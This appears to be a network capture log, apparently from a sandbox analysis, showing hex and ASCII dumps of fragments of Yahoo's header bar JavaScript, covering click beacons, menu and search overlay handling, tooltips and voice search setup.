                                                                                                                                                                        2023-06-02 11:13:21 UTC423INData Raw: 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 2c 69 2c 6f 2c 73 2c 72 29 7b 79 62 61 72 52 61 70 69 64 3f 79 62 61 72 52 61 70 69 64 2e 62 65 61 63 6f 6e 43 6c 69 63 6b 28 65 2c 6e 2c 74 2c 69 2c 6f 2c 73 2c 72 29 3a 28 62 65 61 63 6f 6e 51 75 65 75 65 2e 70 75 73 68 28 7b 74 79 70 65 3a 22 62 65 61 63 6f 6e 43 6c 69 63 6b 22 2c 6f 70 74 69 6f 6e 73 3a 7b 73 65 63 56 61 6c 75 65 3a 65 2c 73 6c 6b 56 61 6c 75 65 3a 6e 2c 5f 70 56 61 6c 75 65 3a 74 2c 63 6c 69 63 6b 50 61 72 61 6d 73 3a 69 2c 6f 75 74 63 6f 6d 65 3a 6f 7c 7c 6e 75 6c 6c 2c 6f 70 74 69 6f 6e 73 3a 72 7c 7c 6e 75 6c 6c 7d 7d 29 2c 73 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 26 26 73 28 29 29 7d 2c 62 65 61 63 6f 6e 45 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                        Data Ascii: ick=function(e,n,t,i,o,s,r){ybarRapid?ybarRapid.beaconClick(e,n,t,i,o,s,r):(beaconQueue.push({type:"beaconClick",options:{secValue:e,slkValue:n,_pValue:t,clickParams:i,outcome:o||null,options:r||null}}),s&&"function"==typeof s&&s())},beaconEvent=function(
                                                                                                                                                                        2023-06-02 11:13:21 UTC424INData Raw: 74 54 69 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 61 76 53 74 61 72 74 54 69 6d 65 3d 65 7d 2c 66 69 72 65 53 61 72 65 61 64 79 43 75 73 74 6f 6d 45 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 6f 6d 4c 6f 61 64 65 64 54 69 6d 65 3d 67 65 74 43 75 72 72 65 6e 74 54 69 6d 65 72 56 61 6c 75 65 28 29 2c 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 26 26 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 26 26 73 65 74 4e 61 76 53 74 61 72 74 54 69 6d 65 28 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 29 2c 77
                                                                                                                                                                        Data Ascii: tTime=function(e){navStartTime=e},fireSareadyCustomEvent=function(){domLoadedTime=getCurrentTimerValue(),window.performance&&window.performance.timing&&window.performance.timing.navigationStart&&setNavStartTime(window.performance.timing.navigationStart),w
                                                                                                                                                                        2023-06-02 11:13:21 UTC425INData Raw: 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 70 61 63 65 69 64 22 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 22 7d 72 65 74 75 72 6e 20 6f 7c 7c 22 22 7d 2c 67 65 74 59 6c 6b 46 72 6f 6d 45 6c 65 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 74 3d 6e 75 6c 6c 3d 3d 3d 28 6e 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 64 61 74 61 73 65 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 79 6c 6b 3b 72 65 74 75 72 6e 20 74 3f 74 2e 73 70 6c 69 74 28 22 3b 22 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 3d 5f 5f 72 65 61 64 28 6e 2e 73 70 6c 69 74 28 22 3a 22 29 2c 32 29 2c 69 3d 74 5b 30 5d 2c 6f 3d 74 5b 31 5d 3b 72 65 74 75 72 6e 20 65 5b 69 5d 3d
                                                                                                                                                                        Data Ascii: etAttribute("data-spaceid"))&&void 0!==t?t:""}return o||""},getYlkFromElem=function(e){var n,t=null===(n=null==e?void 0:e.dataset)||void 0===n?void 0:n.ylk;return t?t.split(";").reduce((function(e,n){var t=__read(n.split(":"),2),i=t[0],o=t[1];return e[i]=
                                                                                                                                                                        2023-06-02 11:13:21 UTC426INData Raw: 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 6f 6e 22 2e 63 6f 6e 63 61 74 28 65 29 2c 69 3d 77 69 6e 64 6f 77 2e 59 42 41 52 5b 74 5d 3b 69 26 26 28 6e 5b 74 5d 3d 69 29 7d 29 29 2c 77 69 6e 64 6f 77 2e 59 42 41 52 2e 77 73 73 69 64 26 26 28 74 68 69 73 2e 77 73 73 69 64 3d 77 69 6e 64 6f 77 2e 59 42 41 52 2e 77 73 73 69 64 29 2c 77 69 6e 64 6f 77 2e 59 42 41 52 2e 61 70 70 69 64 26 26 28 74 68 69 73 2e 61 70 70 69 64 3d 77 69 6e 64 6f 77 2e 59 42 41 52 2e 61 70 70 69 64 29 29 2c 53 55 50 50 4f 52 54 45 44 5f 45 56 45 4e 54 5f 48 4f 4f 4b 53 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 6f 6e 22 2e 63 6f 6e 63 61 74 28 65 29 3b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 28 66 75 6e 63 74 69
                                                                                                                                                                        Data Ascii: unction(e){var t="on".concat(e),i=window.YBAR[t];i&&(n[t]=i)})),window.YBAR.wssid&&(this.wssid=window.YBAR.wssid),window.YBAR.appid&&(this.appid=window.YBAR.appid)),SUPPORTED_EVENT_HOOKS.forEach((function(e){var t="on".concat(e);addEventListener(e,(functi
                                                                                                                                                                        2023-06-02 11:13:21 UTC428INData Raw: 28 29 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 64 65 73 74 72 6f 79 28 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 61 76 69 67 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 2c 74 3d 74 68 69 73 2c 69 3d 65 2e 64 65 74 61 69 6c 2e 65 76 65 6e 74 2c 6f 3d 69 2e 74 61 72 67 65 74 7c 7c 69 2e 73 72 63 45 6c 65 6d 65 6e 74 3b 6e 75 6c 6c 21 3d 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 21 6f 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 61 22 21 3d 3d 6f 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 29 6f 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 76 61 72 20 73 3d 21 31 3b 6f 70 65 6e 73
                                                                                                                                                                        Data Ascii: (),this.modules.forEach((function(e){return e.destroy()}))},e.prototype.navigate=function(e){for(var n,t=this,i=e.detail.event,o=i.target||i.srcElement;null!==o.parentNode&&(!o.nodeName||"a"!==o.nodeName.toLocaleLowerCase());)o=o.parentNode;var s=!1;opens
                                                                                                                                                                        2023-06-02 11:13:21 UTC429INData Raw: 2c 73 63 72 6f 6c 6c 55 70 54 68 72 65 73 68 6f 6c 64 3a 35 7d 2c 73 6d 61 72 74 70 68 6f 6e 65 53 63 72 6f 6c 6c 43 6f 6e 66 69 67 53 68 6f 70 73 4d 77 65 62 3d 7b 73 63 72 6f 6c 6c 50 6f 69 6e 74 73 3a 5b 7b 70 61 67 65 4f 66 66 73 65 74 3a 34 34 2c 61 6e 69 6d 61 74 69 6f 6e 43 6c 61 73 73 4e 61 6d 65 3a 22 79 62 61 72 2d 68 69 64 65 2d 69 6e 6e 65 72 2d 77 72 61 70 22 2c 61 6e 69 6d 61 74 69 6f 6e 43 6c 61 73 73 4e 61 6d 65 4f 6e 53 63 72 6f 6c 6c 55 70 3a 22 79 62 61 72 2d 73 68 6f 77 2d 69 6e 6e 65 72 2d 77 72 61 70 22 2c 74 72 61 6e 73 69 74 69 6f 6e 45 6c 53 65 6c 65 63 74 6f 72 3a 22 23 79 62 61 72 2d 69 6e 6e 65 72 2d 77 72 61 70 22 7d 5d 2c 73 63 72 6f 6c 6c 55 70 54 68 72 65 73 68 6f 6c 64 3a 35 7d 2c 69 6e 69 74 52 61 6e 3d 21 31 2c 69 6e 69
                                                                                                                                                                        Data Ascii: ,scrollUpThreshold:5},smartphoneScrollConfigShopsMweb={scrollPoints:[{pageOffset:44,animationClassName:"ybar-hide-inner-wrap",animationClassNameOnScrollUp:"ybar-show-inner-wrap",transitionElSelector:"#ybar-inner-wrap"}],scrollUpThreshold:5},initRan=!1,ini
                                                                                                                                                                        2023-06-02 11:13:21 UTC430INData Raw: 68 6f 76 65 72 42 65 61 63 6f 6e 54 69 6d 65 6f 75 74 5b 65 5d 7c 7c 28 68 6f 76 65 72 42 65 61 63 6f 6e 54 69 6d 65 6f 75 74 5b 65 5d 3d 21 30 2c 62 65 61 63 6f 6e 43 6c 69 63 6b 28 74 2c 69 2c 22 22 2c 6f 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 68 6f 76 65 72 42 65 61 63 6f 6e 54 69 6d 65 6f 75 74 5b 65 5d 7d 29 2c 31 65 33 29 29 7d 29 29 7d 2c 68 69 64 65 4f 75 74 6c 69 6e 65 4f 6e 4d 6f 75 73 65 44 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 69 3d 22 79 62 61 72 2d 73 68 6f 77 2d 6f 75 74 6c 69 6e 65 22 2c 6f 3d 22 79 62 61 72 2d 68 69 64 65 2d 6f 75 74 6c 69 6e 65 22 2c 73 3d 5b 5d 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 2c
                                                                                                                                                                        Data Ascii: hoverBeaconTimeout[e]||(hoverBeaconTimeout[e]=!0,beaconClick(t,i,"",o),setTimeout((function(){delete hoverBeaconTimeout[e]}),1e3))}))},hideOutlineOnMouseDown=function(e,n,t){var i="ybar-show-outline",o="ybar-hide-outline",s=[],r=document.querySelector(e),
                                                                                                                                                                        2023-06-02 11:13:21 UTC432INData Raw: 77 69 6e 64 6f 77 2e 41 66 2e 63 6f 6e 74 65 78 74 7c 7c 7b 7d 3b 5b 22 61 70 70 74 79 70 65 22 2c 22 72 69 64 22 2c 22 62 75 63 6b 65 74 49 64 22 2c 22 62 75 63 6b 65 74 22 2c 22 64 65 76 69 63 65 22 2c 22 6f 73 4e 61 6d 65 22 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 6f 69 64 20 30 21 3d 3d 6e 5b 74 5d 26 26 28 65 2b 3d 22 26 22 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 5b 74 5d 29 29 29 7d 29 29 7d 63 61 74 63 68 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 72 65 74 75 72 6e 20
                                                                                                                                                                        Data Ascii: window.Af.context||{};["apptype","rid","bucketId","bucket","device","osName","browserName","browserVersion"].forEach((function(t){void 0!==n[t]&&(e+="&".concat(encodeURIComponent(t),"=").concat(encodeURIComponent(n[t])))}))}catch(e){console.log(e)}return
                                                                                                                                                                        2023-06-02 11:13:21 UTC433INData Raw: 63 68 28 65 29 7b 7d 7d 29 2c 31 65 33 29 7d 29 29 7d 2c 6d 65 61 73 75 72 65 49 6e 69 74 3d 6d 65 61 73 75 72 65 28 22 79 62 61 72 2d 69 6e 69 74 22 29 3b 69 6e 69 74 59 62 61 72 28 29 2c 6d 65 61 73 75 72 65 49 6e 69 74 2e 73 74 6f 70 28 29 2c 69 6e 69 74 50 65 72 66 6f 72 6d 61 6e 63 65 4d 65 74 72 69 63 73 42 65 61 63 6f 6e 4c 69 73 74 65 6e 65 72 28 29 2c 69 6e 69 74 52 61 70 69 64 28 29 2c 69 6e 69 74 45 72 72 6f 72 42 65 61 63 6f 6e 4c 69 73 74 65 6e 65 72 28 29 3b 76 61 72 20 73 69 64 65 6e 61 76 3d 22 5f 79 62 5f 31 6a 69 73 68 22 2c 65 78 70 61 6e 64 65 64 3d 22 5f 79 62 5f 79 71 6a 6d 6c 22 2c 63 6f 6c 6c 61 70 73 65 64 3d 22 5f 79 62 5f 31 79 6f 6d 6d 22 2c 68 69 64 65 24 31 3d 22 5f 79 62 5f 6b 62 67 6d 67 22 2c 63 6f 70 79 72 69 67 68 74 3d
                                                                                                                                                                        Data Ascii: ch(e){}}),1e3)}))},measureInit=measure("ybar-init");initYbar(),measureInit.stop(),initPerformanceMetricsBeaconListener(),initRapid(),initErrorBeaconListener();var sidenav="_yb_1jish",expanded="_yb_yqjml",collapsed="_yb_1yomm",hide$1="_yb_kbgmg",copyright=
                                                                                                                                                                        2023-06-02 11:13:21 UTC434INData Raw: 74 45 6c 65 6d 65 6e 74 2c 6c 3d 21 30 2c 64 3d 30 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 3d 21 6c 2c 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 68 69 64 64 65 6e 22 2c 22 22 2e 63 6f 6e 63 61 74 28 6c 29 29 2c 6e 75 6c 6c 3d 3d 63 7c 7c 63 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 79 62 61 72 2d 6f 76 65 72 6c 61 79 22 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 43 73 73 24 38 2e 6e 6f 73 63 72 6f 6c 6c 2c 21 6c 29 2c 72 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 43 73 73 24 38 5b 6e 2b 22 2d 6f 70 65 6e 22 5d 2c 21 6c 29 2c 6c 3f 28 61 2e 73 63 72 6f 6c 6c 54 6f 70 3d 30 2c 74 2e 74 72 69 67 67 65 72 45 76 65 6e 74 28 22 79 62 2d 6f 76 65 72 6c 61
                                                                                                                                                                        Data Ascii: tElement,l=!0,d=0,u=function(){l=!l,a.setAttribute("data-hidden","".concat(l)),null==c||c.classList.toggle("ybar-overlay"),document.body.classList.toggle(Css$8.noscroll,!l),r.classList.toggle(Css$8[n+"-open"],!l),l?(a.scrollTop=0,t.triggerEvent("yb-overla
                                                                                                                                                                        2023-06-02 11:13:21 UTC435INData Raw: 65 2c 6e 29 7b 76 61 72 20 74 3d 65 2e 6d 65 6e 75 2c 69 3d 65 2e 73 69 64 65 6e 61 76 42 74 6e 2c 73 3d 7b 73 65 63 3a 22 79 62 61 72 22 2c 73 6c 6b 3a 22 68 61 6d 62 75 72 67 65 72 22 2c 65 6c 6d 3a 22 63 6c 6f 73 65 22 2c 70 6b 67 74 3a 22 74 6f 70 22 2c 73 75 62 73 65 63 3a 22 6e 61 76 72 61 69 6c 22 2c 69 74 63 3a 22 31 22 7d 3b 74 26 26 69 26 26 22 74 72 75 65 22 3d 3d 3d 69 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 29 26 26 28 6e 26 26 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 74 6f 67 67 6c 65 2d 6f 76 65 72 6c 61 79 22 29 29 2c 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 66 61 6c 73 65 22 29 2c
                                                                                                                                                                        Data Ascii: e,n){var t=e.menu,i=e.sidenavBtn,s={sec:"ybar",slk:"hamburger",elm:"close",pkgt:"top",subsec:"navrail",itc:"1"};t&&i&&"true"===i.getAttribute("aria-expanded")&&(n&&t.dispatchEvent(new CustomEvent("toggle-overlay")),i.setAttribute("aria-expanded","false"),
                                                                                                                                                                        2023-06-02 11:13:21 UTC437INData Raw: 6c 61 73 73 4c 69 73 74 2e 72 65 70 6c 61 63 65 28 22 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 39 2e 65 78 70 61 6e 64 65 64 29 2c 22 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 39 2e 63 6f 6c 6c 61 70 73 65 64 29 29 3b 76 61 72 20 6e 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 75 6c 2e 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 39 5b 22 6d 65 6e 75 2d 6f 70 65 6e 65 64 22 5d 29 29 3b 6e 26 26 73 28 6e 29 7d 7d 29 29 2c 72 29 7b 72 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 70 6c 61 63 65 28 22 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 39 2e 63 6f 6c 6c 61 70 73 65 64 29 2c 22 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 39 2e 65 78 70 61 6e 64 65 64 29 29 3b 76 61 72 20 61 3d 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 75 6c 22 29 3b 61 26 26 61 2e 73 65 74 41
                                                                                                                                                                        Data Ascii: lassList.replace("".concat(Css$9.expanded),"".concat(Css$9.collapsed));var n=e.querySelector("ul.".concat(Css$9["menu-opened"]));n&&s(n)}})),r){r.classList.replace("".concat(Css$9.collapsed),"".concat(Css$9.expanded));var a=r.querySelector("ul");a&&a.setA
                                                                                                                                                                        2023-06-02 11:13:21 UTC438INData Raw: 61 74 28 43 73 73 24 39 2e 65 78 70 61 6e 64 65 64 29 29 7c 7c 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 39 2e 63 6f 6c 6c 61 70 73 65 64 29 29 7d 29 2c 35 30 30 29 2c 76 6f 69 64 20 62 65 61 63 6f 6e 43 6c 69 63 6b 28 22 79 62 61 72 22 2c 65 2e 73 6c 6b 2c 22 22 2c 65 29 3b 74 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 39 2e 63 6f 6c 6c 61 70 73 65 64 29 29 2c 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 39 2e 65 78 70 61 6e 64 65 64 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 39 5b 22 6d 65 6e 75 2d 6f 70 65 6e 65
                                                                                                                                                                        Data Ascii: at(Css$9.expanded))||t.classList.add("".concat(Css$9.collapsed))}),500),void beaconClick("ybar",e.slk,"",e);t.classList.remove("".concat(Css$9.collapsed)),t.classList.add("".concat(Css$9.expanded)),function(e,n){e.classList.add("".concat(Css$9["menu-opene
                                                                                                                                                                        2023-06-02 11:13:21 UTC439INData Raw: 22 79 62 61 72 2d 73 68 6f 77 2d 6f 75 74 6c 69 6e 65 22 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 79 62 61 72 2d 68 69 64 65 2d 6f 75 74 6c 69 6e 65 22 29 7d 29 29 29 7d 2c 6c 6f 67 6f 43 6c 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 6e 26 26 65 2e 61 64 64 45 6c 65 6d 65 6e 74 4c 69 73 74 65 6e 65 72 28 6e 2c 22 63 6c 69 63 6b 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 74 72 69 67 67 65 72 45 76 65 6e 74 28 22 6c 6f 67 6f 2d 63 6c 69 63 6b 22 29 7d 29 29 7d 2c 69 6e 69 74 24 34 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 6e 2e 6c 6f 67 6f 49 6d 61 67 65 73 26 26 68 69 64 65 4c 6f 67 6f 73 4f 6e 45 72 72 6f 72 28 6e 2e 6c 6f 67 6f 49 6d 61 67 65 73 29 2c 6e 2e 77 72 61 70 70 65 72 26 26 28 66 69 78 4c 6f 67 6f 4f
                                                                                                                                                                        Data Ascii: "ybar-show-outline"),e.classList.remove("ybar-hide-outline")})))},logoClick=function(e,n){n&&e.addElementListener(n,"click",(function(){e.triggerEvent("logo-click")}))},init$4=function(e,n){n.logoImages&&hideLogosOnError(n.logoImages),n.wrapper&&(fixLogoO
                                                                                                                                                                        2023-06-02 11:13:21 UTC440INData Raw: 65 5f 73 65 61 72 63 68 5f 75 69 2c 73 3d 76 6f 69 64 20 30 21 3d 3d 6f 26 26 6f 3b 69 66 28 6e 2e 79 62 61 72 29 7b 6e 2e 79 62 61 72 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 79 62 61 72 2d 73 65 61 72 63 68 62 6f 78 2d 61 73 73 69 73 74 2d 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 79 62 61 72 2d 6f 76 65 72 6c 61 79 22 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 79 62 61 72 2d 6f 76 65 72 6c 61 79 2d 6e 6f 73 63 72 6f 6c 6c 22 29 3b 62 65 61 63 6f 6e 43 6c 69 63 6b 28 22 79 62 61 72 22 2c 22 77 65 62 73 72 63 68 22 2c 22 22 2c 7b 65 6c 6d 3a 22 65 78 70 61 6e 64 22 2c 73 75 62 73 65
                                                                                                                                                                        Data Ascii: e_search_ui,s=void 0!==o&&o;if(n.ybar){n.ybar.classList.add("ybar-searchbox-assist-fullscreen"),document.documentElement.classList.add("ybar-overlay"),document.body.classList.add("ybar-overlay-noscroll");beaconClick("ybar","websrch","",{elm:"expand",subse
                                                                                                                                                                        2023-06-02 11:13:21 UTC442INData Raw: 6e 74 4c 69 73 74 65 6e 65 72 28 6e 2e 73 65 61 72 63 68 42 6f 78 42 61 63 6b 42 75 74 74 6f 6e 2c 22 63 6c 69 63 6b 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 63 6c 6f 73 65 53 65 61 72 63 68 4f 76 65 72 6c 61 79 28 6e 29 3b 62 65 61 63 6f 6e 43 6c 69 63 6b 28 22 79 62 61 72 22 2c 22 62 61 63 6b 2d 63 6c 6f 73 65 2d 73 72 63 68 22 2c 22 22 2c 7b 65 6c 6d 3a 22 62 74 6e 22 2c 73 75 62 73 65 63 3a 22 73 65 61 72 63 68 62 6f 78 22 2c 69 74 63 3a 22 31 22 7d 29 7d 29 29 2c 65 2e 61 64 64 45 6c 65 6d 65 6e 74 4c 69 73 74 65 6e 65 72 28 6e 2e 73 65 61 72 63 68 49 6e 70 75 74 2c 22 6b 65 79 75 70 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b
                                                                                                                                                                        Data Ascii: ntListener(n.searchBoxBackButton,"click",(function(e){e.stopPropagation(),closeSearchOverlay(n);beaconClick("ybar","back-close-srch","",{elm:"btn",subsec:"searchbox",itc:"1"})})),e.addElementListener(n.searchInput,"keyup",(function(e){e.stopPropagation();
                                                                                                                                                                        2023-06-02 11:13:21 UTC443INData Raw: 2e 73 68 6f 77 29 2c 74 68 69 73 2e 79 62 61 72 2e 61 64 64 45 6c 65 6d 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 68 69 73 2e 65 6c 65 6d 2c 22 66 6f 63 75 73 22 2c 74 68 69 73 2e 73 68 6f 77 29 2c 74 68 69 73 2e 79 62 61 72 2e 61 64 64 45 6c 65 6d 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 68 69 73 2e 65 6c 65 6d 2c 22 6d 6f 75 73 65 6c 65 61 76 65 22 2c 74 68 69 73 2e 68 69 64 65 29 2c 74 68 69 73 2e 79 62 61 72 2e 61 64 64 45 6c 65 6d 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 68 69 73 2e 65 6c 65 6d 2c 22 62 6c 75 72 22 2c 74 68 69 73 2e 68 69 64 65 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 72 65 61 74 65 54 6f 6f 6c 74 69 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69
                                                                                                                                                                        Data Ascii: .show),this.ybar.addElementListener(this.elem,"focus",this.show),this.ybar.addElementListener(this.elem,"mouseleave",this.hide),this.ybar.addElementListener(this.elem,"blur",this.hide)},e.prototype.createTooltip=function(){var e=document.createElement("di
                                                                                                                                                                        2023-06-02 11:13:21 UTC444INData Raw: 6e 66 69 67 29 20 7b 5c 6e 20 20 20 20 76 61 72 20 73 65 6c 66 20 3d 20 74 68 69 73 3b 5c 6e 20 20 20 20 73 65 6c 66 2e 63 6f 6e 66 69 67 20 3d 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 64 65 66 61 75 6c 74 43 6f 6e 66 69 67 2c 20 63 6f 6e 66 69 67 20 7c 7c 20 7b 7d 29 3b 5c 6e 20 20 20 20 73 65 6c 66 2e 69 31 38 6e 20 3d 20 6e 65 77 20 56 6f 69 63 65 53 65 61 72 63 68 2e 49 31 38 6e 28 7b 5c 6e 20 20 20 20 20 20 6c 61 6e 67 3a 20 73 65 6c 66 2e 63 6f 6e 66 69 67 2e 75 69 4c 61 6e 67 5c 6e 20 20 20 20 7d 29 3b 5c 6e 20 20 20 20 73 65 6c 66 2e 72 65 6e 64 65 72 50 65 72 6d 69 73 73 69 6f 6e 47 75 69 64 65 28 73 65 6c 66 29 3b 5c 6e 20 20 20 20 73 65 6c 66 2e 72 65 6e 64 65 72 53 70 65 65 63 68 50 61 6e 65 6c 28 73 65 6c 66 29 3b 5c 6e 20 20 20 20 73 65
                                                                                                                                                                        Data Ascii: nfig) {\n var self = this;\n self.config = Object.assign(defaultConfig, config || {});\n self.i18n = new VoiceSearch.I18n({\n lang: self.config.uiLang\n });\n self.renderPermissionGuide(self);\n self.renderSpeechPanel(self);\n se
                                                                                                                                                                        2023-06-02 11:13:21 UTC446INData Raw: 3d 20 6e 65 77 20 41 75 64 69 6f 28 27 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 70 76 2f 73 74 61 74 69 63 2f 6d 69 73 63 2f 76 6f 69 63 65 2d 72 65 73 75 6c 74 2d 32 30 32 31 30 35 30 35 30 37 33 33 2e 77 61 76 27 29 3b 5c 6e 20 20 20 20 73 65 6c 66 2e 65 72 72 6f 72 41 75 64 69 6f 20 3d 20 6e 65 77 20 41 75 64 69 6f 28 27 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 70 76 2f 73 74 61 74 69 63 2f 6d 69 73 63 2f 76 6f 69 63 65 2d 65 72 72 6f 72 2d 32 30 32 31 30 35 30 35 30 37 33 33 2e 77 61 76 27 29 3b 5c 6e 20 20 20 20 73 65 6c 66 2e 63 6c 6f 73 65 41 75 64 69 6f 20 3d 20 6e 65 77 20 41 75 64 69 6f 28 27 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 70 76 2f 73 74 61 74 69 63 2f 6d 69 73 63 2f 76 6f 69 63 65 2d 63
                                                                                                                                                                        Data Ascii: = new Audio('https://s.yimg.com/pv/static/misc/voice-result-202105050733.wav');\n self.errorAudio = new Audio('https://s.yimg.com/pv/static/misc/voice-error-202105050733.wav');\n self.closeAudio = new Audio('https://s.yimg.com/pv/static/misc/voice-c
